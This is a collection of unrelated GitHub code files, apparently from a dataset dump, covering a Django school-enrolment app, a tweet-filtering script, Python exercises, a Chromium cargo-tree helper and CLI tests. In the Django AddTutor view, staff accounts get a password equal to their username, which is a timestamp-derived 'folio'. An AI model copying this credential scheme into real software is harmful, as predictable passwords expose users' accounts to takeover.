Inscripcion(TemplateView):\n #login_url = '/direccion/login/'\n modelos = [Alumno,PadreTutor]\n fields = {'alumno':FIELDS_ALUMNO, 'tutor':FIELDS_TUTOR}\n general_form = FormCreator()\n widgets_alumno = {\n 'nacimiento': forms.TextInput(attrs={'type':'date',\n 'class':'form-control'}),\n }\n\n def format_form(self, fields, forma):\n for l in fields:\n label = forma.base_fields.get(l).label\n forma.base_fields.get(l).widget.attrs={'class':'form-control',\n 'placeholder':label\n }\n\n def gen_folio(self):\n d = datetime.now()\n folio = '%s%s%s%s%s%s'%(str(d.year)[:2], \n d.month, \n d.day, \n d.hour, \n d.minute, \n d.second)\n folio = int(folio)\n folio = hex(folio).upper()\n return folio\n\n def post(self, request):\n data = request.POST.copy()\n paso=int(data['step'])\n pk = data.get('id',None)\n instanced = None\n folio = 0\n if len(pk)>0:\n instanced = Alumno.objects.get(id=pk)\n pasos = [self.fields['alumno'],self.fields['tutor']]\n modelo = self.modelos[paso]\n campos = pasos[paso]\n form = self.general_form.form_to_model(modelo=modelo,fields=campos)\n form = form(data, instance=instanced)\n if form.is_valid():\n f = form.save()\n if paso==0 and not instanced:\n f.folio = self.gen_folio()\n f.save()\n\n response = {'id':f.id, 'folio':f.folio}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n\n\n def get(self, request):\n context = {}\n form_alumno = self.general_form.form_to_model(modelo=Alumno, \n excludes=[], \n widgets=self.widgets_alumno)\n self.format_form(self.fields['alumno'], form_alumno) \n form_tutor = self.general_form.form_to_model(modelo=PadreTutor, \n fields=self.fields['tutor'])\n\n self.format_form(self.fields['tutor'], form_tutor) \n context['form_alumno'] = form_alumno\n context['form_tutor'] = form_tutor\n return render(request, 'direction/inscripcion.html', context)\n\nclass AddTutor(TemplateView, Commonds):\n 
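# POST here either updates an existing PadreTutor (looked up by 'id_parent')\n    # or creates a new one with a freshly generated folio; on first creation it\n    # also registers a Django auth User whose username and password are both\n    # that folio, then replies with JSON (id/folio/callbacks, or form errors).\n    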
def post(self, request):\n context = {}\n data = request.POST.copy()\n instanced = None\n try:\n idp = request.POST.get('id_parent')\n instanced = PadreTutor.objects.get(pk=idp)\n data['folio'] = instanced.folio\n except:\n data['folio'] = self.gen_folio()\n form = FORM.form_to_model(modelo=PadreTutor, excludes=[])\n form = form(data, instance=instanced)\n if form.is_valid():\n if not instanced:\n user = User.objects.create_user(username=data['folio'],\n email='%s@cendipiaget.com'%(data['folio']),\n is_staff=True,\n password=data['folio'])\n f = form.save()\n callbacks = ['activate_paso_dos',]\n response = {'id':f.id, 'folio':f.folio, 'callbacks':callbacks}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n\nclass AddAlumno(TemplateView, Commonds):\n def post(self, request):\n context = {}\n data = request.POST.copy()\n data['folio'] = self.gen_folio()\n instanced = None\n form = FORM.form_to_model(modelo=Alumno, excludes=[])\n form = form(data, instance=instanced)\n if form.is_valid():\n f = form.save()\n f.foto = request.FILES.get('foto')\n f.save()\n callbacks = ['activate_paso_tres',]\n response = {'id':f.id, 'folio':f.folio, 'callbacks':callbacks}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n","repo_name":"atomychouse/cendi","sub_path":"direction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37787634710","text":"import pandas as pd\n\ndataset = pd.read_csv(\"C:/dataset/2013_pakistan_eq_temp.csv\", header=0)\n\nrelevant_labels = (\"caution_and_advice\", \"displaced_people_and_evacuations\", \"infrastructure_and_utilities_damage\",\n \"injured_or_dead_people\", \"missing_trapped_or_found_people\", \"other_useful_information\")\n\ndataset = dataset[~dataset[\"Label\"].isin(relevant_labels)]\n\ndataset = dataset.set_index(\"TweetID\")\n\ncol_names = list(dataset.columns.values)\n\ndataset.to_csv(\"C:/dataset/2013_pakistan_eq_irrelevant.csv\",\n header=col_names, index=True, sep=',', mode='w')\n","repo_name":"FVerg/crisis-tweet-classifier","sub_path":"irrelevant_tweets.py","file_name":"irrelevant_tweets.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12770266186","text":"import os\nimport re\nfrom difflib import SequenceMatcher\nfrom itertools import product\nfrom urllib.request import urlretrieve\n\n# prep\nTAG_HTML = re.compile(r'([^<]+)')\nTEMPFILE = os.path.join('tmp', 'feed')\nMIN_TAG_LEN = 10\nIDENTICAL = 1.0\nSIMILAR = 0.95\n\nurlretrieve('http://bit.ly/2zD8d8b', TEMPFILE)\n\n\ndef _get_tags(tempfile=TEMPFILE):\n \"\"\"Helper to parse all tags from a static copy of PyBites' feed,\n providing this here so you can focus on difflib\"\"\"\n with open(tempfile) as f:\n content = f.read().lower()\n # take a small subset to keep it performant\n tags = TAG_HTML.findall(content)\n tags = [tag for tag in tags if len(tag) > MIN_TAG_LEN]\n return set(tags)\n\n\ndef get_similarities(tags=None):\n \"\"\"Should return a list of similar tag pairs (tuples)\"\"\"\n tags = tags or _get_tags()\n pairs = [(x, y) for x, y in list(product(tags, tags, repeat=1)) if x != y]\n good_pairs = []\n for pair in pairs:\n if SequenceMatcher(None, pair[0],pair[1]).ratio() > SIMILAR:\n good_pairs.append(pair)\n return 
good_pairs\nprint(get_similarities())","repo_name":"AlterFritz88/pybits","sub_path":"bite23.py","file_name":"bite23.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"4572318936","text":"import json\r\nimport os\r\nimport difflib \r\npath = '\\\\Users\\\\pc\\\\Desktop'\r\nos.chdir(path)\r\ndata = json.load(open('data.json'))\r\n\r\n\r\ndef translate(word):\r\n word_matched = difflib.get_close_matches(word , data.keys())\r\n word = word.lower()\r\n if word in data:\r\n return data[word]\r\n elif word.title() in data: \r\n return data[word.title()]\r\n if word.upper() in data:\r\n return data[word.upper()]\r\n elif len(word_matched) > 0:\r\n yn = input(\"Did you mean %s instead , Enter Y or N\" % word_matched[0])\r\n if yn == 'Y':\r\n return data[word_matched[0]]\r\n elif yn == 'N':\r\n return('this word does not exist')\r\n \r\n else:\r\n return('this word does not exist')\r\n \r\n\r\nword = input('enter a word:')\r\n\r\noutput =translate(word)\r\n\r\n\r\nif type(output) == list:\r\n for item in output:\r\n print(item)\r\nelse:\r\n print(output)\r\n","repo_name":"depo-egy/Python-Projects","sub_path":"Python_Dictionary/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9868565873","text":"\r\nimport random\r\nrandomnumber=random.randint(1,100)\r\n#print(randomnumber)\r\nb=None\r\nguesses=0\r\nwhile (b!=randomnumber):\r\n b=int(input(\"please enter your guess number from 1 to 100: \"))\r\n\r\n\r\n if int(randomnumber==b):\r\n print(\"finally, yours guess is right👏👏🌹\")\r\n print(f\"you gussed it right in {guesses} times\")\r\n\r\n else:\r\n print('try again')\r\n if (randomnumber)>b:\r\n print(\"higher number please\")\r\n guesses +=1\r\n elif (randomnumber str:\n return \"CrateKey({} v{})\".format(self.name, self.epoch)\n\n def __eq__(self, other: object) -> bool:\n if not isinstance(other, CrateKey):\n return NotImplemented\n return self.name == other.name and self.epoch == other.epoch\n\n def __hash__(self) -> int:\n return hash(\"{}: {}\".format(self.name, self.epoch))\n\n\nclass CrateUsage(Enum):\n \"\"\"The ways that a crate's library can be used from other crates.\"\"\"\n FOR_NORMAL = 1, # Used from another crate's lib/binary outputs.\n FOR_BUILDRS = 2, # Used from another crates's build.rs.\n FOR_TESTS = 3, # Used from another crate's tests.\n\n def gn_target_name(self) -> str:\n \"\"\"The name to use for a gn target.\n\n This is the name of the target used for generating the target in the\n BUILD.gn file. 
The name is based on how the target will be used, since\n crates have different features enabled when being built for use in\n tests, or for use from a build.rs build script.\"\"\"\n if self == CrateUsage.FOR_NORMAL:\n return CrateBuildOutput.NORMAL.gn_target_name_for_dep()\n elif self == CrateUsage.FOR_BUILDRS:\n return CrateBuildOutput.BUILDRS.gn_target_name_for_dep()\n elif self == CrateUsage.FOR_TESTS:\n return CrateBuildOutput.TESTS.gn_target_name_for_dep()\n else:\n return NotImplemented\n\n\nclass CrateBuildOutput(Enum):\n \"\"\"The various build outputs when building a crate.\"\"\"\n NORMAL = 1 # Building the crate's normal output.\n BUILDRS = 2 # Building the crate's build.rs.\n TESTS = 3 # Building the crate's tests.\n\n def as_dep_usage(self) -> CrateUsage:\n if self == CrateBuildOutput.NORMAL:\n return CrateUsage.FOR_NORMAL\n elif self == CrateBuildOutput.BUILDRS:\n return CrateUsage.FOR_BUILDRS\n elif self == CrateBuildOutput.TESTS:\n return CrateUsage.FOR_TESTS\n else:\n assert False # Unhandled CrateBuildOutput?\n\n def gn_target_name_for_dep(self):\n \"\"\"The name to use for gn dependency targets.\n\n This is the name of the target to use for a dependency in the `deps`,\n `build_deps`, or `dev_deps` section of a BUILD.gn target. The name\n depends on what kind of dependency it is, since crates have different\n features enabled when being built for use in tests, or for use from a\n build.rs build script.\"\"\"\n if self == CrateBuildOutput.NORMAL:\n return \"lib\"\n if self == CrateBuildOutput.BUILDRS:\n return \"buildrs_support\"\n if self == CrateBuildOutput.TESTS:\n return \"test_support\"\n\n def _cargo_tree_edges(self) -> str:\n \"\"\"Get the argument for `cargo tree --edges`\n\n Returns what to pass to the --edges argument when running `cargo tree`\n to see the dependencies of a given build output.\"\"\"\n if self == CrateBuildOutput.NORMAL:\n return \"normal\"\n elif self == CrateBuildOutput.BUILDRS:\n return \"build\"\n elif self == CrateBuildOutput.TESTS:\n return \"dev\"\n else:\n return NotImplemented\n\n\ndef run_cargo_tree(path: str, build: CrateBuildOutput,\n target_arch: Optional[str], depth: Optional[int],\n features: list) -> list[str]:\n \"\"\"Runs `cargo tree` on the Cargo.toml file at `path`.\n\n Note that `cargo tree` actually invokes `rustc` a bunch to collect its\n output, but it does not appear to actually compile anything. Additionally,\n we are running `cargo tree` in a temp directory with placeholder rust files\n present to satisfy `cargo tree`, so no source code from crates.io should\n be compiled, or run, by this tool.\n\n Args:\n target_arch: one of the ALL_RUSTC_ARCH which are targets understood by\n rustc, and shown by `rustc --print target-list`. 
Or none, in which\n case the current machine's architecture is used.\n\n Returns:\n The output of cargo tree, with split by lines into a list.\n \"\"\"\n tree_cmd = [\n \"cargo\",\n \"tree\",\n \"--manifest-path\",\n path,\n \"--edges\",\n build._cargo_tree_edges(),\n \"--format={p} {f}\",\n \"-v\",\n ]\n if target_arch:\n tree_cmd += [\"--target\", target_arch]\n if depth is not None:\n tree_cmd += [\"--depth\", str(depth)]\n if \"default\" not in features:\n tree_cmd += [\"--no-default-features\"]\n features = [f for f in features if not f == \"default\"]\n if features:\n tree_cmd += [\"--features\", \",\".join(features)]\n try:\n r = subprocess.check_output(tree_cmd, text=True, stderr=subprocess.PIPE)\n except subprocess.CalledProcessError as e:\n print()\n print(' '.join(tree_cmd))\n print(e.stderr)\n raise e\n return r.splitlines()\n\n\ndef add_required_cargo_fields(toml_3p):\n \"\"\"Add required fields for a Cargo.toml to be parsed by `cargo tree`.\"\"\"\n toml_3p[\"package\"] = {\n \"name\": \"chromium\",\n \"version\": \"1.0.0\",\n }\n return toml_3p\n\n\nclass ListOf3pCargoToml:\n \"\"\"A typesafe cache of info about local third-party Cargo.toml files.\"\"\"\n\n class CargoToml:\n def __init__(self, name: str, epoch: str, path: str):\n self.name = name\n self.epoch = epoch\n self.path = path\n\n def __init__(self, list_of: list[CargoToml]):\n self._list_of = list_of\n\n\ndef write_cargo_toml_in_tempdir(\n dir: str,\n all_3p_tomls: ListOf3pCargoToml,\n orig_toml_parsed: Optional[dict[str, Any]] = None,\n orig_toml_path: Optional[str] = None,\n verbose: bool = False) -> str:\n \"\"\"Write a temporary Cargo.toml file that will work with `cargo tree`.\n\n Creates a copy of a Cargo.toml, specified in `orig_toml_path`, in to the\n temp directory specified by `dir` and sets up the temp dir so that running\n `cargo` will succeed. Also points all crates named in `all_3p_tomls` to\n the downloaded versions.\n\n Exactly one of `orig_toml_parsed` or `orig_toml_path` must be specified.\n\n Args:\n dir: An OS path to a temp directory where the Cargo.toml file is to be\n written.\n all_3p_tomls: A cache of local third-party Cargo.toml files, crated by\n gen_list_of_3p_cargo_toml(). The generated Cargo.toml will be patched\n to point `cargo tree` to local Cargo.tomls for dependencies in order\n to see local changes.\n orig_toml_parsed: The Cargo.toml file contents to write, as a\n dictionary.\n orig_toml_path: An OS path to the Cargo.toml file which should be copied\n into the output Cargo.toml.\n verbose: Whether to print verbose output, including the full TOML\n content.\n\n Returns:\n The OS path to the output Cargo.toml file in `dir`, for convenience.\n \"\"\"\n assert bool(orig_toml_parsed) ^ bool(orig_toml_path)\n orig_toml_text: Optional[str] = None\n if orig_toml_path:\n with open(orig_toml_path, \"r\") as f:\n orig_toml_text = f.read()\n orig_toml_parsed = dict(toml.loads(orig_toml_text))\n\n # This assertion is necessary for type checking. 
Now mypy deduces\n # orig_toml_parsed's type as dict[str, Any] instead of Optional[...]\n assert orig_toml_parsed is not None\n\n orig_name = orig_toml_parsed[\"package\"][\"name\"]\n orig_epoch = common.version_epoch_dots(\n orig_toml_parsed[\"package\"][\"version\"])\n\n if all_3p_tomls is None:\n all_3p_tomls = ListOf3pCargoToml([])\n\n # Since we're putting a Cargo.toml in a temp dir, cargo won't be\n # able to find the src/lib.rs and will bail out, so we make it.\n os.mkdir(os.path.join(dir, \"src\"))\n with open(os.path.join(dir, \"src\", \"lib.rs\"), mode=\"w\") as f:\n f.write(\"lib.rs\")\n # Same thing for build.rs, as some Cargo.toml flags make it go looking\n # for a build script to verify it exists.\n if not \"build\" in orig_toml_parsed[\"package\"]:\n with open(os.path.join(dir, \"build.rs\"), mode=\"w\") as f:\n f.write(\"build.rs\")\n # And [[bin]] targets, if they have a name but no path, expect to\n # find a file at src/bin/%name%.rs or at src/main.rs, though when\n # one is preferred is unclear. It seems to always work with the\n # former one though, but not always with the latter.\n if \"bin\" in orig_toml_parsed:\n os.mkdir(os.path.join(dir, \"src\", \"bin\"))\n for bin in orig_toml_parsed[\"bin\"]:\n if \"path\" not in bin and \"name\" in bin:\n with open(os.path.join(dir, \"src\", \"bin\",\n \"{}.rs\".format(bin[\"name\"])),\n mode=\"w\") as f:\n f.write(\"bin main.rs\")\n # Workspaces in a crate's Cargo.toml need to point to other Cargo.toml files\n # on disk, and those Cargo.toml files require a lib or binary source as\n # well. We don't support building workspaces, but cargo will die if it can't\n # find them.\n if \"workspace\" in orig_toml_parsed:\n for m in orig_toml_parsed[\"workspace\"].get(\"members\", []):\n workspace_dir = os.path.join(dir, *(m.split(\"/\")))\n os.makedirs(workspace_dir)\n with open(os.path.join(workspace_dir, \"Cargo.toml\"), mode=\"w\") as f:\n f.write(consts.FAKE_EMPTY_CARGO_TOML)\n bin_dir = os.path.join(workspace_dir, \"src\", \"bin\")\n os.makedirs(bin_dir)\n with open(os.path.join(bin_dir, \"main.rs\"), mode=\"w\") as f:\n f.write(\"workspace {} bin main.rs\".format(m))\n\n # Generate a patch that points the current crate, to the temp dir, and all\n # others to `consts.THIRD_PARTY`. This is to deal with build/dev deps that\n # transitively depend back on the current crate. Otherwise it gets seen in\n # 2 paths.\n patch: dict[str, Any] = {\"patch\": {\"crates-io\": {}}}\n cwd = os.getcwd()\n for in_3p in all_3p_tomls._list_of:\n if in_3p.name == orig_name and in_3p.epoch == orig_epoch:\n # If this is the crate we're creating a temp Cargo.toml for, point\n # the patch to the temp dir.\n abspath = dir\n else:\n # Otherwise, point the patch to the downloaded third-party crate's\n # dir.\n abspath = os.path.join(cwd, in_3p.path)\n patch_name = (\"{}_v{}\".format(\n in_3p.name, common.version_epoch_normalized(in_3p.epoch)))\n patch[\"patch\"][\"crates-io\"][patch_name] = {\n \"version\": in_3p.epoch,\n \"path\": abspath,\n \"package\": in_3p.name,\n }\n\n tmp_cargo_toml_path = os.path.join(dir, \"Cargo.toml\")\n # This is the third-party Cargo.toml file. Note that we do not write\n # the `orig_toml_parsed` as the python parser does not like the contents\n # of some Cargo.toml files that cargo is just fine with. 
So we write the\n # contents without a round trip through the parser.\n if orig_toml_text:\n cargo_toml_text = orig_toml_text\n else:\n cargo_toml_text = toml.dumps(orig_toml_parsed)\n # We attach our \"patch\" keys onto it to redirect all crates.io\n # dependencies into `consts.THIRD_PARTY`.\n cargo_toml_text = cargo_toml_text + toml.dumps(patch)\n # Generate our own (temp) copy of a Cargo.toml for the dependency\n # that we will run `cargo tree` against.\n with open(tmp_cargo_toml_path, mode=\"w\") as tmp_cargo_toml:\n tmp_cargo_toml.write(cargo_toml_text)\n if verbose:\n print(\"Writing to %s:\" % tmp_cargo_toml_path)\n print(\"=======\")\n print(cargo_toml_text)\n print(\"=======\")\n\n return tmp_cargo_toml_path\n\n\ndef gen_list_of_3p_cargo_toml() -> ListOf3pCargoToml:\n \"\"\"Create a cached view of existing third-party crates.\n\n Find all the third-party crates present and cache them for generating\n Cargo.toml files in temp dirs that will point to them.\"\"\"\n list_of: list[ListOf3pCargoToml.CargoToml] = []\n for normalized_crate_name in os.listdir(common.os_third_party_dir()):\n crate_dir = common.os_crate_name_dir(normalized_crate_name)\n if not os.path.isdir(crate_dir):\n continue\n for v_epoch in os.listdir(crate_dir):\n epoch = v_epoch.replace(\"v\", \"\").replace(\"_\", \".\")\n filepath = common.os_crate_cargo_dir(normalized_crate_name,\n epoch,\n rel_path=[\"Cargo.toml\"])\n if os.path.exists(filepath):\n cargo_toml = toml.load(filepath)\n # Note this can't use the directory name because it was\n # normalized, so we read the real name from the Cargo.toml.\n name = cargo_toml[\"package\"][\"name\"]\n assert common.crate_name_normalized(\n name) == normalized_crate_name\n # The version epoch comes from the directory name.\n list_of += [\n ListOf3pCargoToml.CargoToml(\n name, epoch,\n common.os_crate_cargo_dir(normalized_crate_name, epoch))\n ]\n return ListOf3pCargoToml(list_of)\n","repo_name":"react-native-skia/react-native-skia","sub_path":"tools/crates/lib/cargo.py","file_name":"cargo.py","file_ext":"py","file_size_in_byte":13832,"program_lang":"python","lang":"en","doc_type":"code","stars":901,"dataset":"github-code","pt":"83"} +{"seq_id":"28119508318","text":"import json\nimport aiohttp\nimport requests\nimport asyncio\nimport time\nfrom datetime import datetime\n\nfrom ets_data import token_get\nfrom db2 import data_get\nfrom db2 import data_post\nfrom db2 import data_delete\nimport settings\n\n\ndata = []\ndata_cars = {}\ntokens = {}\n\n\nasync def car_action(username, token):\n data_car = []\n url = 'https://ets.mos.ru/services/car_actual'\n headers = {\n 'Authorization': token,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\n }\n car = requests.get(url, headers=headers)\n data_full = json.loads(car.text)\n data_result = data_full['result']['rows']\n for x in data_result:\n if x['waybill_closing_date'] is None:\n continue\n else:\n date1 = datetime.strptime(str(x['waybill_closing_date']), \"%Y-%m-%dT%H:%M:%S\").strftime(\"%Y-%m-%d\")\n data_car.append((x['asuods_id'], x['gov_number'], date1, x['okrug_name'], x['company_name'], x['level_sensors_num'], x['gps_code']))\n\n data_cars[username] = data_car\n\n\nasync def get_waybill_data(username, token, session, asuods_id, level_sensors_num, gps_code, closing_date):\n url = 'https://ets.mos.ru/services/waybill?limit=1&sort_by=number:desc&filter={\"car_id__in\":[\"' + str(asuods_id) + 
'\"],\"status__in\":[\"closed\"],\"closing_date__eq\":\"' + str(closing_date) + '\"}'\n headers = {\n 'Authorization': token,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\n }\n try:\n async with session.get(url, headers=headers, timeout=600) as resp:\n wb = await resp.json()\n if wb['result'] and isinstance(wb['result'], list):\n waybill = wb['result'][0]\n waybill['level_sensors_num'] = level_sensors_num\n waybill['gps_code'] = gps_code\n return waybill\n else:\n print(f'Нет данных: {username, wb, url}')\n except TimeoutError:\n print(f'Таймаут {username, url}')\n\n\nasync def main():\n\n start = time.time()\n\n table_column = 'date_upload, okrug_name, company_name, gov_number, fact_fuel_end, sensor_finish_value, difference, status, date, level_sensors_num, gps_code, status_diff'\n users = await data_get('*', 'ets_users', '', settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n for user in users:\n username = user[1]\n password = user[2]\n tokens[username] = await token_get(username, password)\n await car_action(username, tokens[username])\n\n async with aiohttp.ClientSession() as session:\n tasks = []\n for username in data_cars:\n for car in data_cars[username]:\n tasks.append(asyncio.ensure_future(get_waybill_data(username, tokens[username], session, car[0], car[5], car[6], car[2])))\n waybills_data = await asyncio.gather(*tasks)\n for x in waybills_data:\n if x:\n fuel_end = (0 if x['equipment_fact_fuel_end'] is None else x['equipment_fact_fuel_end']) + x['fact_fuel_end']\n sensor_value = 0 if x['sensor_finish_value'] is None else x['sensor_finish_value']\n result_fuel = round(fuel_end - sensor_value, 2)\n data.append((datetime.now().date().strftime('%Y-%m-%d'),\n x['okrug_name'],\n x['company_name'],\n x['gov_number'],\n fuel_end,\n 0 if x['sensor_finish_value'] is None else x['sensor_finish_value'],\n result_fuel,\n \"ДУТ не работает\" if x['sensor_finish_value'] == '0' else 'ДУТ работает',\n x['closing_date'],\n x['level_sensors_num'],\n 'Нет БНСО' if x['gps_code'] is None else x['gps_code'],\n \"Остаток\" if result_fuel > 0 else \"Норма\"))\n\n params = 'where extract(day from (current_timestamp::timestamp without time zone - date_upload::timestamp without time zone)) > 7 OR extract(day from (current_timestamp::timestamp without time zone - date_upload::timestamp without time zone)) = 0'\n await data_delete('deficit_fuel', params, settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n await data_post(data, 'deficit_fuel', table_column, settings.DB_SCRIPTS, 'scripts', settings.DB_ACCESS)\n\n print(time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start)))\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"Maxtremality/govScripts","sub_path":"deficit_fuel.py","file_name":"deficit_fuel.py","file_ext":"py","file_size_in_byte":4693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20243260946","text":"import os\nimport shutil\nimport tempfile\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom unittest import TestCase, skipIf\n\nfrom openmapflow.constants import VERSION\n\n\nclass TestCLI(TestCase):\n \"\"\"\n openmapflow must be installed for these tests to run\n \"\"\"\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_cp(self):\n tmpdir = tempfile.mkdtemp()\n p = Path(tmpdir) / \"Dockerfile\"\n self.assertFalse(p.exists())\n check_output(\n [\"openmapflow\", \"cp\", 
\"Dockerfile\", f\"{tmpdir}\"], cwd=tmpdir\n ).decode()\n self.assertTrue(p.exists())\n shutil.rmtree(tmpdir)\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_dir(self):\n output = check_output([\"openmapflow\", \"dir\"]).decode().rstrip()\n self.assertTrue(output.endswith(\"openmapflow\"))\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_ls(self):\n output = check_output([\"openmapflow\", \"ls\"]).decode().rstrip()\n self.assertIn(\"Dockerfile\", output)\n self.assertIn(\"__init__.py\", output)\n self.assertIn(\"config.py\", output)\n self.assertIn(\"constants.py\", output)\n self.assertIn(\"generate.py\", output)\n self.assertIn(\"inference_utils.py\", output)\n self.assertIn(\"inference_widgets.py\", output)\n self.assertIn(\"labeled_dataset.py\", output)\n self.assertIn(\"notebooks\", output)\n self.assertIn(\"pytorch_dataset.py\", output)\n self.assertIn(\"scripts\", output)\n self.assertIn(\"templates\", output)\n self.assertIn(\"train_utils.py\", output)\n self.assertIn(\"trigger_inference_function\", output)\n self.assertIn(\"utils.py\", output)\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_version(self):\n self.assertEqual(\n check_output([\"openmapflow\", \"version\"]).decode().rstrip(), VERSION\n )\n self.assertEqual(\n check_output([\"openmapflow\", \"--version\"]).decode().rstrip(), VERSION\n )\n\n @skipIf(os.name == \"nt\", \"Not yet available on Windows\")\n def test_help(self):\n self.maxDiff = None\n actual_output = check_output([\"openmapflow\", \"help\"]).decode().rstrip()\n long_line = \"-\" * 93\n expected_output = f\"\"\"{long_line}\n OpenMapFlow CLI\\n{long_line}\nopenmapflow cp - copy a file or directory from the library\nopenmapflow create-datasets - creates datasets for all datasets in datasets.py\nopenmapflow datapath - outputs a relative path to the data directory\nopenmapflow datasets - outputs a list of all datasets\nopenmapflow deploy - deploys Google Cloud Architecture for project\nopenmapflow dir - outputs openmapflow library directory\nopenmapflow generate - generates an openmapflow project\nopenmapflow help - outputs this message\nopenmapflow ls - lists files in openmapflow library directory\nopenmapflow verify - verifies a user declared LabeledDataset class in datasets.py\nopenmapflow version - package version\"\"\"\n self.assertEqual(actual_output, expected_output)\n","repo_name":"nasaharvest/openmapflow","sub_path":"tests/test_CLI.py","file_name":"test_CLI.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"83"} +{"seq_id":"17410997694","text":"import numpy as np\nimport tensorflow as tf\n\nTRAINING_DATA = 'iris_training.csv'\nTEST_DATA = 'iris_test.csv'\n\n\ndef main():\n feature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=1)]\n\n training_set = tf.contrib.learn.datasets.base.load_csv_with_header(filename=TRAINING_DATA, target_dtype=np.int,\n features_dtype=np.float32)\n test_set = tf.contrib.learn.datasets.base.load_csv_with_header(filename=TEST_DATA, target_dtype=np.int,\n features_dtype=np.float32)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lpj0017/XiaoLuAI","sub_path":"test/tflearn/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8657022071","text":"from django.contrib.auth.models import 
User\nfrom django.db import models\n\n# Create your models here.\n\nfrom utils.helpers import file_upload_directory\n\n\nclass UserTypeChoice(models.TextChoices):\n TEACHER = 'TEACHER'\n STUDENT = 'STUDENT'\n ADMIN = 'ADMIN'\n PLAYER = 'PLAYER'\n\n\nclass GenderChoice(models.TextChoices):\n MALE = 'MALE'\n FEMALE = 'FEMALE'\n OTHERS = 'OTHERS'\n\n\nclass Profile(models.Model):\n user = models.OneToOneField('auth.User', on_delete=models.CASCADE)\n image = models.ImageField(upload_to=file_upload_directory, null=True, blank=True)\n\n gender = models.CharField(max_length=10, choices=GenderChoice.choices, default=GenderChoice.MALE)\n user_type = models.CharField(max_length=100, choices=UserTypeChoice.choices, default=UserTypeChoice.STUDENT)\n phone_number = models.CharField(max_length=11, null=True, blank=True)\n address = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return self.user.first_name + ' ' + self.user.last_name\n\n def department(self):\n if self.user_type == UserTypeChoice.STUDENT:\n return self.student.department.name\n elif self.user_type == UserTypeChoice.TEACHER:\n return self.teacher.department.name\n","repo_name":"Himel-b11/sports_django","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42037207860","text":"# Unit 60\n# a = []\n# dir(a) shows the list of all functions\n\n# while True:\n# words = input(\"Say something: \")\n# a.append(words)\n# if \"\\end\" in a:\n# a.remove(\"\\end\")\n# print(*a, sep='. ')\n# break\n\n\ndef sentence_maker(phrase):\n interrogatives =(\"how\", \"what\", \"why\")\n capitalitzed = phrase.capitalize()\n if phrase.startswith(interrogatives):\n return \"{}?\".format(capitalitzed)\n else:\n return \"{}\".format(capitalitzed)\n\n\n# print(sentence_maker(\"how are you\"))\n\nresults = []\nwhile True:\n user_input = input(\"Say something: \")\n if user_input == \"\\end\":\n break\n else:\n results.append(sentence_maker(user_input))\n\nprint(\" \".join(results))","repo_name":"jhkoh17/python_basic","sub_path":"section8.py","file_name":"section8.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74335851472","text":"import wx\nclass LinkUI(wx.Dialog):\n\tdef __init__(self, parent, url):\n\t\tself.parent=parent\n\t\twx.Dialog.__init__(self, parent, title=\"URL Ready\", size=wx.DefaultSize) # initialize the wx frame\n\t\tself.panel = wx.Panel(self)\n\t\tself.main_box = wx.BoxSizer(wx.VERTICAL)\n\t\tself.Bind(wx.EVT_CLOSE, self.OnClose)\n\t\tself.link_label = wx.StaticText(self.panel, -1, \"Audio &link\")\n\t\tself.link = wx.TextCtrl(self.panel, -1, \"\",style=wx.TE_READONLY)\n\t\tself.link.SetValue(url)\n\t\tself.main_box.Add(self.link, 0, wx.ALL, 10)\n\t\tself.link.SetFocus()\n\t\tself.close = wx.Button(self.panel, wx.ID_CANCEL, \"&Cancel\")\n\t\tself.close.Bind(wx.EVT_BUTTON, self.OnClose)\n\t\tself.main_box.Add(self.close, 0, wx.ALL, 10)\n\t\tself.panel.Layout()\n\t\n\tdef OnClose(self, event):\n#\t\tself.parent.Raise()\n#\t\tself.parent.SetFocus()\n\t\tself.Destroy()\n\ndef ShowLink(parent,url):\n\tlink = LinkUI(parent,url)\n\treturn 